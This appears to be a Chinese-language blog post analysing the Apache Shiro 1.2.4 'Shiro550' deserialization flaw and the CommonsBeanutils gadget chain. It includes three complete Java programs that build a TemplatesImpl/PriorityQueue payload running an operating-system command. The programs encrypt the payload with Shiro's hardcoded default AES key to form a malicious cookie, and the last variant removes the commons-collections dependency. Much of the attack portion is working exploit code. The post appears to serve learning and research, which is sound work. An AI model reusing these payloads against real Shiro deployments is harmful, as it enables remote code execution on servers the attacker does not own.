前言
Shiro,一个流行的web框架,养活了一大批web狗,现在来对它分析分析。Shiro的gadget是CB链,其实是CC4改过来的,因为Shiro框架是自带Commoncollections的,除此之外还带了一个包叫做CommonBeanUtils,主要利用类就在这个包里
环境搭建
https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4
编辑shiro/samples/web目录下的pom.xml,将jstl的版本修改为1.2
<dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <version>1.2</version> <scope>runtime</scope> </dependency> 之后tomat搭起来就行了,选择sample-web.war
CB链分析
先回顾一下CC4
* Gadget chain: * ObjectInputStream.readObject() * PriorityQueue.readObject() * PriorityQueue.heapify() * PriorityQueue.siftDown() * PriorityQueue.siftDownUsingComparator() * TransformingComparator.compare() * InvokerTransformer.transform() * Method.invoke() * TemplatesImpl.newTransformer() * TemplatesImpl.getTransletInstance() * Runtime.exec() CB链跟CC4的不同点就是从compare开始的,正好可以从CommonBeanUtils包里找到BeanComparator这个类
主要看PropertyUtils.getProperty这个方法可以任意类的get方法调用,可以调用任意bean(class)的一个get方法去获取nameproperty属性
写个demo测试一下
package org.example; import org.apache.commons.beanutils.PropertyUtils; import java.lang.reflect.InvocationTargetException; public class User { private String name; private int age; public User(String name, int age){ this.name = name; this.age = age; } public String getName() { System.out.println("Hello, getname"); return name; } public int getAge() { System.out.println("Hello, getage"); return age; } public void setName(String name) { this.name = name; } public void setAge(int age) { this.age = age; } public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException { PropertyUtils.getProperty(new User("F12", 18), "name"); PropertyUtils.getProperty(new User("F12", 18), "age"); } } // 输出 Hello, getname Hello, getage 这样就可以利用TemplatesImpl中的getOutputProperties方法,这里面可以触发任意类的实例化,从而执行命令,注意这个类须继承AbstractTranslet类,或则改掉父类的默认值,如果忘了请回顾CC3
依赖:
<dependencies> <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> <version>1.8.3</version> </dependency> <dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-core</artifactId> <version>1.2.4</version> </dependency> <dependency> <groupId>org.javassist</groupId> <artifactId>javassist</artifactId> <version>3.27.0-GA</version> </dependency> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version> </dependency> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.1.1</version> </dependency> </dependencies> package org.example; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.*; import org.apache.commons.beanutils.BeanComparator; import java.io.*; import java.lang.reflect.Field; import java.util.PriorityQueue; public class Test { public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static void serialize(Object obj) throws IOException { FileOutputStream fis = new FileOutputStream("cb.bin"); ObjectOutputStream ois = new ObjectOutputStream(fis); ois.writeObject(obj); } public static void deserialize(String filename) throws IOException, ClassNotFoundException { FileInputStream fis = new FileInputStream(filename); ObjectInputStream ois = new ObjectInputStream(fis); ois.readObject(); } public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException { ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(AbstractTranslet.class)); CtClass ct = pool.makeClass("Cat"); String cmd = "java.lang.Runtime.getRuntime().exec("calc");"; ct.makeClassInitializer().insertBefore(cmd); String randomClassName = "Evil" + System.nanoTime(); ct.setName(randomClassName); ct.setSuperclass(pool.get(AbstractTranslet.class.getName())); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()}); setFieldValue(obj, "_name", "F12"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); final BeanComparator beanComparator = new BeanComparator(); final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator); priorityQueue.add(1); priorityQueue.add(2); setFieldValue(beanComparator, "property", "outputProperties"); setFieldValue(priorityQueue, "queue", new Object[]{obj, obj}); serialize(priorityQueue); deserialize("cb.bin"); } } 追踪一下链的过程,在PriorityQueue的readObject打个断点,开追,进入heapify
进入siftDown
进入siftDownUsingComparator
进入compare,到达关键点,获取TemplatesImpl的outputProperites属性
调用TemplatesImpl.getOutputProperites
进入newTransformer
进入getTransletInstance,到达世界最高城defineTransletClasses
后面就不看了,就是defineClass,至此CB链结束,还挺简单的
Shiro550分析
环境上面已经搭建好了,这里不说了
Shiro550用的其实就是CB链,这里只是有一些细节需要注意,Shiro的触发点是Cookie处解码时会进行反序列化,他生成的反序列化字符串是进行AES对称加密的,因此要在对数据进行一次AES加密,反序列化漏洞的利用就建立在知晓key的情况下,而shiro最初时,key是直接硬编码写在源码里的,全局搜serialize
可以看到这个DEFAULT_CIPHER_KEY_BYTES,amazing
package org.example; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.*; import org.apache.commons.beanutils.BeanComparator; import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.util.ByteSource; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.PriorityQueue; public class Test { public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static void serialize(Object obj) throws IOException { FileOutputStream fis = new FileOutputStream("cb.bin"); ObjectOutputStream ois = new ObjectOutputStream(fis); ois.writeObject(obj); } public static void deserialize(String filename) throws IOException, ClassNotFoundException { FileInputStream fis = new FileInputStream(filename); ObjectInputStream ois = new ObjectInputStream(fis); ois.readObject(); } public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException { ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(AbstractTranslet.class)); CtClass ct = pool.makeClass("Cat"); String cmd = "java.lang.Runtime.getRuntime().exec("calc");"; ct.makeClassInitializer().insertBefore(cmd); String randomClassName = "Evil" + System.nanoTime(); ct.setName(randomClassName); ct.setSuperclass(pool.get(AbstractTranslet.class.getName())); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()}); setFieldValue(obj, "_name", "F12"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); final BeanComparator beanComparator = new BeanComparator(); final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator); priorityQueue.add(1); priorityQueue.add(2); setFieldValue(beanComparator, "property", "outputProperties"); setFieldValue(priorityQueue, "queue", new Object[]{obj, obj}); serialize(priorityQueue); byte[] bytes = Files.readAllBytes(Paths.get("D:\Java安全学习\Property\cb.bin")); AesCipherService aes = new AesCipherService(); byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); ByteSource encrypt = aes.encrypt(bytes, key); System.out.println(encrypt.toString()); } } 但是直接报错了,报的是cc中的ComparableComparator的那个错,虽然shiro中内置了CommonCollection的一部分,但是并不是所有,而org.apache.commons.collections.comparators.ComparableComparator这个类就在CC包里面,且在shiro中没有,所以寄
无依赖Shiro550 Attack
关键点在于compare方法,如果不指定comparator的话,会默认为cc中的ComparableComparator
因此我们需要指定一个Comparator
- 实现java.util.Comparator接口
- 实现java.io.Serializable接口
- Java、shiro或commons-beanutils自带,且兼容性强
可以找到AttrCompare
package org.example; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; import javassist.*; import org.apache.commons.beanutils.BeanComparator; import org.apache.commons.collections.map.CaseInsensitiveMap; import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.util.ByteSource; import sun.misc.ASCIICaseInsensitiveComparator; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.Comparator; import java.util.PriorityQueue; public class Test { public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static void serialize(Object obj) throws IOException { FileOutputStream fis = new FileOutputStream("cb.bin"); ObjectOutputStream ois = new ObjectOutputStream(fis); ois.writeObject(obj); } public static void deserialize(String filename) throws IOException, ClassNotFoundException { FileInputStream fis = new FileInputStream(filename); ObjectInputStream ois = new ObjectInputStream(fis); ois.readObject(); } public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException { ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(AbstractTranslet.class)); CtClass ct = pool.makeClass("Cat"); String cmd = "java.lang.Runtime.getRuntime().exec("calc");"; ct.makeClassInitializer().insertBefore(cmd); String randomClassName = "Evil" + System.nanoTime(); ct.setName(randomClassName); ct.setSuperclass(pool.get(AbstractTranslet.class.getName())); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{ct.toBytecode()}); setFieldValue(obj, "_name", "F12"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); final BeanComparator beanComparator = new BeanComparator(); final PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator); priorityQueue.add(1); priorityQueue.add(2); setFieldValue(beanComparator, "property", "outputProperties"); setFieldValue(beanComparator, "comparator", new AttrCompare()); setFieldValue(priorityQueue, "queue", new Object[]{obj, obj}); serialize(priorityQueue); byte[] bytes = Files.readAllBytes(Paths.get("D:\Java安全学习\Property\cb.bin")); AesCipherService aes = new AesCipherService(); byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); ByteSource encrypt = aes.encrypt(bytes, key); System.out.println(encrypt.toString()); } } 成功Attack
